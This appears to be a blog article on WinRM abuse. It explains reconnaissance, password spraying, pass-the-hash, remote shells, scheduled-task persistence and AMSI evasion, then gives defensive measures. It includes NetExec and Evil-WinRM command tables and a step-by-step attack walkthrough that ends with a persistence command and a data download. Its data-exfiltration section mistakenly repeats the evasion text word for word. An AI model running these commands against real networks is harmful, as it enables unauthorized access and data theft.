In 2025, a majority of cyberattacks use a company’s own tools against them. This “living-off-the-land” technique makes threats hard to spot. One of the most common tools hackers use is built right into your systems: Windows Remote Management (WinRM).
WinRM is designed to be “firewall-friendly,” which is exactly what makes it so dangerous. It often goes undetected by traditional security, creating a hidden backdoor. For US businesses, this useful management tool can be a major risk. So, how do you defend against a threat designed to be ignored?
Table of Contents
Why WinRM is a Target for Penetration Testers
Penetration testers, and the hackers they imitate, love using WinRM. It provides a powerful and stealthy way to control systems across a network. In facts, Evil-WinRM, a popular open-source tool for pentesters, has over 4,900 stars on GitHub, showing widespread adoption in the ethical hacking community.
Here are the key reasons why it’s such a popular target for attacks in 2025.
- It runs PowerShell remotely. WinRM is the main way to run PowerShell commands on other computers. PowerShell is a powerful scripting language built directly into Windows. This is a huge advantage for attackers, as cybersecurity reports this year show that PowerShell is used in a high percentage of network intrusions because it’s already a trusted part of the system.
- It helps attackers “Live off the Land.” This tactic, known as LotL, means using a target’s own built-in tools to attack them. Using WinRM and PowerShell looks like normal IT work to many security systems. This helps attackers blend in and avoid being detected by antivirus or other monitoring tools.
- It’s built for admins. WinRM is designed for IT administrators to manage servers. This means if an attacker steals an admin’s password, they can use WinRM to gain powerful access and potentially take over the entire network. For US businesses with large remote workforces, securing these admin tools is more critical than ever.
Why Can’t You Rely On Default Configuration and Ports?
Default settings are designed for convenience, not security. The default configuration of Windows Remote Management (WinRM) is a perfect example of this, creating a significant risk for many networks.
Here’s what you need to know:
- It uses common ports. WinRM communicates over standard web ports (HTTP 5985 and HTTPS 5986). These ports are often already open on internal firewalls, making the traffic hard to block without careful configuration.
- It’s on by default for servers. On Windows Server 2012 and newer versions, WinRM is enabled automatically. The Windows Firewall is also pre-configured to allow WinRM traffic on private networks.
This default setup creates an open door for attackers. Once they gain a foothold in a network, they can use WinRM to move from machine to machine. This tactic, called lateral movement, is a major concern for US businesses. Cybersecurity data from mid-2025 shows that lateral movement is a key stage in the vast majority of major ransomware attacks and data breaches.
For an attacker, this default configuration makes it much easier to reach high-value targets, turning a small intrusion into a major compromise.
WinRM Enumeration and Discovery
Before launching an attack, penetration testers and hackers first gather information. This reconnaissance phase involves finding systems running WinRM and learning about their configuration.
Identifying Open WinRM Ports (Nmap Scans)
The first step is a simple port scan using a tool like Nmap to find open WinRM ports.
A key finding for an attacker is an open port 5985 (HTTP) without an open port 5986 (HTTPS). This means WinRM is communicating in plain text, without encryption. This is a common but critical oversight. Security audits in mid-2025 continue to find that a surprising number of internal US business networks still use unencrypted protocols, leaving them vulnerable to snooping.
Basic WinRM Service Status Check (Test-WSMan)
Attackers can use Test-WSMan, a tool built into PowerShell, to check if WinRM is running on a computer and to learn its operating system version.
This is a stealthy technique. Because Test-WSMan is a legitimate administrative tool, using it for reconnaissance often goes unnoticed by basic security monitoring. It’s a classic example of an attacker “living off the land” by using the system’s own tools against it.
User Enumeration (NetExec)
While WinRM itself doesn’t have a simple user lookup feature, attackers can use other tools to get the information they need. A powerful tool called NetExec can query the network for a complete list of user accounts.
This list is gold for an attacker. They can then use it to launch “password spraying” attacks against WinRM. This technique, which involves testing a few common passwords against many user accounts, remains a top method for gaining initial access in many US data breaches today. This shows how a weakness in one area of the network can be used to attack another.
WinRM Authentication Methods and Attacks
Understanding how users log in with WinRM is key to seeing how it can be attacked. Some login methods are secure, while others leave a wide-open door for hackers.
Supported Authentication Protocols
WinRM supports several login methods. By default, it uses secure options like Kerberos or NTLM, which do not send passwords in clear text.
However, it can also be configured to use “Basic” authentication. This method is highly insecure because it sends the username and password in a way that is very easy for an attacker to read. Using insecure login methods is a huge risk, as compromised credentials continue to be the cause of a vast number of data breaches in the US.
NTLM Relay Attacks
This is a clever attack where a hacker tricks a computer, captures its login attempt, and then “relays” or forwards it to another computer to gain access. This attack often works when other basic security settings, like SMB signing, are not enabled on the network. It shows how one small misconfiguration can lead to a major security problem.
Password Spraying (NetExec)
Instead of trying hundreds of passwords on one user account (which would lock it out), password spraying is the opposite. An attacker tries one or two very common passwords (like Summer2025!) against hundreds of different user accounts.
This tactic remains highly effective in mid-2025, as many organizations still struggle with users choosing weak or common passwords. A tool called NetExec makes it easy for attackers to automate this process against WinRM.
Pass-the-Hash (Evil-WinRM, NetExec)
This is a powerful technique where an attacker doesn’t need your password at all. They only need to steal the “hash” (a scrambled version of your password) from a computer’s memory.
Tools like Evil-WinRM allow an attacker to use this stolen hash to log in to other machines on the network. This type of lateral movement is a key stage in most major ransomware attacks, as it allows hackers to move silently from one computer to another.
Key Table: Common WinRM Attacks with NetExec
This table shows simple commands used to attack WinRM with the popular tool NetExec.
| Attack Type | Example Command | Purpose |
| Basic Login | nxc winrm <target> -u user -p ‘Pass123!’ | Tests a specific username and password. |
| Password Spray | nxc winrm <target> -u users.txt -p ‘Summer2025!’ | Tries one password against a list of users. |
| Pass-the-Hash | nxc winrm <target> -u user -H <hash> | Logs in using a stolen password hash instead of the password. |
| Run Command | nxc winrm <target> -u user -p ‘Pass123!’ -x ‘whoami’ | Runs a command on the remote machine after logging in. |
Remote Command Execution via WinRM
Once an attacker has valid login credentials, WinRM becomes a powerful tool for running commands on other computers. This is where a small breach can turn into a major incident.
PowerShell Remoting (Invoke-Command, Enter-PSSession)
This is the official, built-in Windows way to control computers remotely using WinRM. An attacker doesn’t need to install any extra software.
This is a major threat. By using legitimate Windows tools, attackers can “live off the land,” making their activity hard to spot. Recent security reports for mid-2025 show a sharp increase in “fileless” attacks that run entirely in a computer’s memory, making them very difficult for traditional antivirus programs to detect. Because PowerShell Remoting is a trusted feature, it gives attackers the perfect cover.
Evil-WinRM Usage
Evil-WinRM is a popular tool built by the security community specifically for hacking with WinRM. It makes the process of attacking much simpler.
This tool gives an attacker an easy-to-use, interactive command prompt on the target machine. It streamlines logging in with stolen passwords or hashes and makes it simple to upload or download files. Think of it as a specialized weapon designed to exploit WinRM’s power.
NetExec (formerly CrackMapExec) for WinRM
NetExec is a powerful tool designed to automate attacks across an entire network. For WinRM, it can be used to run commands on hundreds of computers at once.
A key feature of NetExec is its ability to “obfuscate” or scramble its commands to hide from security software. The rise of powerful, free, open-source tools like NetExec means US businesses can no longer rely on just firewalls. Robust Endpoint Detection and Response (EDR) solutions are now essential for spotting this kind of internal activity.
Key Table: Evil-WinRM Core Commands
This table shows the basic commands for Evil-WinRM, a tool designed for WinRM exploitation.
| Command | Example Usage | Description |
| Login | evil-winrm -i <IP> -u USER -p PASS | Starts a remote control session with a password. |
| Upload | upload local_file.txt remote_file.txt | Sends a file from your computer to the target. |
| Download | download remote_file.txt local_file.txt | Gets a file from the target computer. |
| Shell | whoami | Runs commands on the remote machine. |
Persistence and Lateral Movement with WinRM
After an attacker gets inside a network, their goals change. They want to spread to other computers and make sure they can’t be kicked out. WinRM is a powerful tool for both of these tasks.
Leveraging WinRM for Lateral Movement
Lateral movement is when an attacker uses one compromised computer to attack other computers on the same internal network.
Once an attacker has an administrator password, they can use WinRM to log into other valuable systems, like servers. From there, they can run tools to steal even more passwords from memory. This is a critical stage for attackers. Cybersecurity data for mid-2025 shows that the average “dwell time”—the time an attacker is inside a network before being detected—can be weeks or even months. Lateral movement is what they do during this time to find and steal valuable data.
Establishing Persistence (Scheduled Tasks via WinRM)
Persistence is how an attacker ensures they can always get back into a system, even if the computer is rebooted or the user logs off.
A common and very effective way to do this is with the built-in Windows Task Scheduler. An attacker can use WinRM to create a hidden, scheduled task on a compromised machine. This task can be set to automatically re-run their malicious code every few minutes or every time a user logs in. This is a top tactic for attackers because it blends in with normal system activity. In fact, the use of the legitimate Task Scheduler is one of the most common persistence techniques seen in US corporate breaches.
Evasion Techniques
Skilled attackers don’t just break in; they know how to hide. When using WinRM and PowerShell, they have several powerful ways to avoid being detected by security software.
PowerShell In-Memory Execution
This is a stealthy attack that runs entirely in a computer’s RAM, or memory. The malicious code is never saved to the hard drive as a file.
This is a growing threat for US businesses. Because traditional antivirus programs mainly scan files on the disk, they are often blind to this type of attack. Security analyses in mid-2025 show that “fileless” malware now accounts for a significant and increasing percentage of all cyberattacks, allowing hackers to operate invisibly.
AMSI Bypass (Evil-WinRM’s capabilities)
AMSI, or the Antimalware Scan Interface, is a modern Windows security feature. Think of it as a security guard that lets your antivirus software inspect what PowerShell scripts are doing as they run. An “AMSI Bypass” is a trick an attacker uses to fool or disable that guard.
Common bypass methods include:
- Flipping a software switch in memory to tell AMSI to stop scanning.
- Directly tampering with the AMSI program code while it’s running.
- Using older versions of PowerShell that were created before AMSI existed.
Hacking tools like Evil-WinRM have these bypasses built-in, making it easy to run malicious code without setting off alarms. This means that relying on a single security feature is no longer enough. To combat these advanced techniques, companies now need modern tools like Endpoint Detection and Response (EDR) that can spot suspicious behavior, not just known viruses.
Data Exfiltration via WinRM
Skilled attackers don’t just break in; they know how to hide. When using WinRM and PowerShell, they have several powerful ways to avoid being detected by security software.
PowerShell In-Memory Execution
This is a stealthy attack that runs entirely in a computer’s RAM, or memory. The malicious code is never saved to the hard drive as a file.
This is a growing threat for US businesses. Because traditional antivirus programs mainly scan files on the disk, they are often blind to this type of attack. Security analyses in mid-2025 show that “fileless” malware now accounts for a significant and increasing percentage of all cyberattacks, allowing hackers to operate invisibly.
AMSI Bypass (Evil-WinRM’s capabilities)
AMSI, or the Antimalware Scan Interface, is a modern Windows security feature. Think of it as a security guard that lets your antivirus software inspect what PowerShell scripts are doing as they run. An “AMSI Bypass” is a trick an attacker uses to fool or disable that guard.
Common bypass methods include:
- Flipping a software switch in memory to tell AMSI to stop scanning.
- Directly tampering with the AMSI program code while it’s running.
- Using older versions of PowerShell that were created before AMSI existed.
Hacking tools like Evil-WinRM have these bypasses built-in, making it easy to run malicious code without setting off alarms. This means that relying on a single security feature is no longer enough. To combat these advanced techniques, companies now need modern tools like Endpoint Detection and Response (EDR) that can spot suspicious behavior, not just known viruses.
Mitigation and Defense Strategies
Defending against WinRM attacks requires a security strategy with multiple layers. You cannot rely on just one control. Here are the key actions every US business should take.
Securing WinRM Configuration
The easiest way to reduce risk is to secure the tool itself. Don’t trust the default settings.
- Turn it off. If your administrators do not need WinRM for remote management, disable it.
- Force HTTPS. If you must use WinRM, configure it to require HTTPS (port 5986). This encrypts the traffic and verifies the server’s identity.
- Limit Trusted Hosts. Tightly control which computers are allowed to connect via WinRM.
This is a critical first step. Security reports in mid-2025 show that simple server misconfigurations are still a leading cause of major data breaches.
Implementing Strong Authentication
How users log in is your most important defense. Weak passwords make even the strongest firewalls useless.
- Avoid “Basic” Auth. This method sends login details in a way that is easy to steal. Use more secure options like Kerberos.
- Require Multi-Factor Authentication (MFA). This is the single most effective defense against stolen credentials. Up-to-date security data consistently shows that MFA can block over 99% of account compromise attacks.
Monitoring and Detection
You need to be able to spot suspicious activity, even when attackers use legitimate tools.
- Use an EDR solution. Traditional antivirus is not enough. An Endpoint Detection and Response (EDR) tool watches for suspicious behavior, not just known viruses. It can spot an attacker using PowerShell for malicious reasons.
- Turn on PowerShell logging. Enable detailed logging features like Script Block Logging and Transcription. This creates a record of all commands being run, which is essential for investigating an incident.
- Monitor Scheduled Tasks. Keep an eye out for any strange new tasks being created on your systems, as this is a common way for hackers to maintain persistence.
PowerShell Logging and Constrained Language Mode
Finally, you should harden PowerShell itself to make it a less effective weapon for attackers.
- Use Constrained Language Mode. This setting limits PowerShell’s capabilities for regular users, preventing them from running advanced or dangerous commands.
- Require Signed Scripts. Configure your systems to only run PowerShell scripts that have been digitally signed by a trusted administrator. This prevents attackers from running their own unauthorized code.
How to Exploit WinRM for Penetration Testing: Step-by-Step
Understanding how an attack works is key to defending against it. This is a typical path a penetration tester—or a real attacker—would follow to exploit WinRM. The entire process, from initial scan to data theft, can sometimes happen in just a matter of hours.
Step 1: Identify WinRM Targets
The first goal is to find computers on the network with WinRM enabled. This is done by scanning for open WinRM ports (5985 and 5986).
Bash
# Scan a target for open WinRM ports
nmap -p 5985,5986 <target_IP>
Step 2: User Enumeration
Next, the attacker needs a list of valid usernames. Tools like NetExec can scan the network and discover user accounts.
Bash
# Get a list of users from a target
nxc smb <target_IP> –users
Step 3: Authentication and Credential Attacks
With a list of users, the attacker tries to get a valid password. Common methods include:
- Password Spraying: Trying one common password against many different users.
- Pass-the-Hash: Using a stolen password hash to log in without knowing the actual password.
Bash
# Example: Password spraying with NetExec
nxc winrm <target_IP> -u users.txt -p ‘Summer2025!’
Step 4: Establish Remote Shell (Evil-WinRM)
Once they have a valid login, attackers use a tool like Evil-WinRM to get a remote command prompt on the target machine.
Bash
# Connect to a target with a password
evil-winrm -i <target_IP> -u <username> -p <password>
Step 5: Post-Exploitation and Lateral Movement
With remote control, the attacker can now do damage. They can steal more passwords, set up persistence to maintain access, and move to other computers on the network.
PowerShell
# Example: Create a scheduled task for persistence
schtasks /create /tn “Update” /tr “C:\tmp\payload.exe” /sc onlogon
Step 6: Evasion Techniques
To avoid getting caught, attackers use tricks to hide their activity. This includes running code directly in a computer’s memory to bypass antivirus and using built-in features to disable security monitoring tools like AMSI.
Step 7: Data Exfiltration
The final goal is often to steal sensitive data. Using their remote shell, attackers can find valuable files and download them to their own computer.
Bash
# Download a sensitive file with Evil-WinRM
download C:\secrets\project_data.zip /home/attacker/loot/
Conclusion
Windows Remote Management (WinRM) is a useful tool for IT admins and a powerful weapon for hackers. Attackers use this trusted, built-in feature to move silently through your network, making them very difficult to detect.
Protecting your US business requires a layered defense. You must secure WinRM’s configuration, enforce Multi-Factor Authentication (MFA), and use modern security tools to monitor for suspicious behavior. With the cost of cybercrime reaching new highs in mid-2025, securing these internal pathways is no longer optional. It is an essential part of modern defense.